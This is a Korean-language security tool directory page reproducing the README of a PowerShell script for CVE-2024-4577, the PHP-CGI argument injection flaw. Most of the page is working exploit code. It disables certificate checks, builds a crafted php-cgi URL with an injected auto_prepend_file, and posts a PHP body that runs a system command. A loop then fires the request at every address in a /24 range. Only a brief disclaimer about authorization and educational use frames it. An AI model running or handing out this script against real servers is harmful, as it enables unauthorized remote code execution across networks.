Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-4577_PowerShell — PowsrShell로 CVE-2024-4577 스캔 | Kitploit
도구/GitHubGitHub/tntrock/cve-2024-4577_powershell
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubtntrock/cve-2024-4577_powershell

CVE-2024-4577_PowerShell

PowsrShell로 CVE-2024-4577 스캔

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-4577_PowerShell

참고:
대상 환경에서 이러한 침투 테스트를 수행할 권한이 있는지 확인하십시오. 허가 없이 공격 기술을 사용하면 관련 법률을 위반할 수 있습니다.
이 코드는 교육 및 연구 목적으로만 제공되며, 합법적이고 윤리적인 범위 내에서 사용하십시오.
침투 테스트가 초래할 수 있는 결과를 이해하지 못한다면, 레드팀 전문가를 고용하여 테스트를 진행하는 것이 좋습니다.

설명

먼저 웹 인증서 검사를 무시하도록 설정합니다.

root@kitploit:~
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

주요 공격 Payload

root@kitploit:~
$url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
$body = "<?php system('whoami'); die(); ?>"

function으로 묶고 PowerShell 내장 Invoke-WebRequest로 전송합니다 (TimeoutSec 설정은 필요에 따라 조정 가능).

root@kitploit:~
function Invoke-RequestForIP {
    param (
        [string]$IP,
        [string]$Protocol
    )
    $url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
    $body = "<?php system('whoami'); die(); ?>"
    try {
        $response = Invoke-WebRequest -Uri $url -Method Post -Body $body -UseBasicParsing -TimeoutSec 2
        return $response.Content
    } catch {
        return $_.Exception.Message
    }
}

루프를 통해 10.0.0.1 ~ 10.0.0.255 스캔

root@kitploit:~
$baseIP = "10.0.0."
$start = 1
$end = 255

for ($i = $start; $i -le $end; $i++) {
    $currentIP = $baseIP + $i
    foreach ($protocol in @("http", "https")) {
        $result = Invoke-RequestForIP -IP $currentIP -Protocol $protocol
        Write-Output "IP: $currentIP, Protocol: $protocol, Result: $result"
    }
}

참고 자료

https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability
https://nvd.nist.gov/vuln/detail/cve-2024-4577

도구 다운로드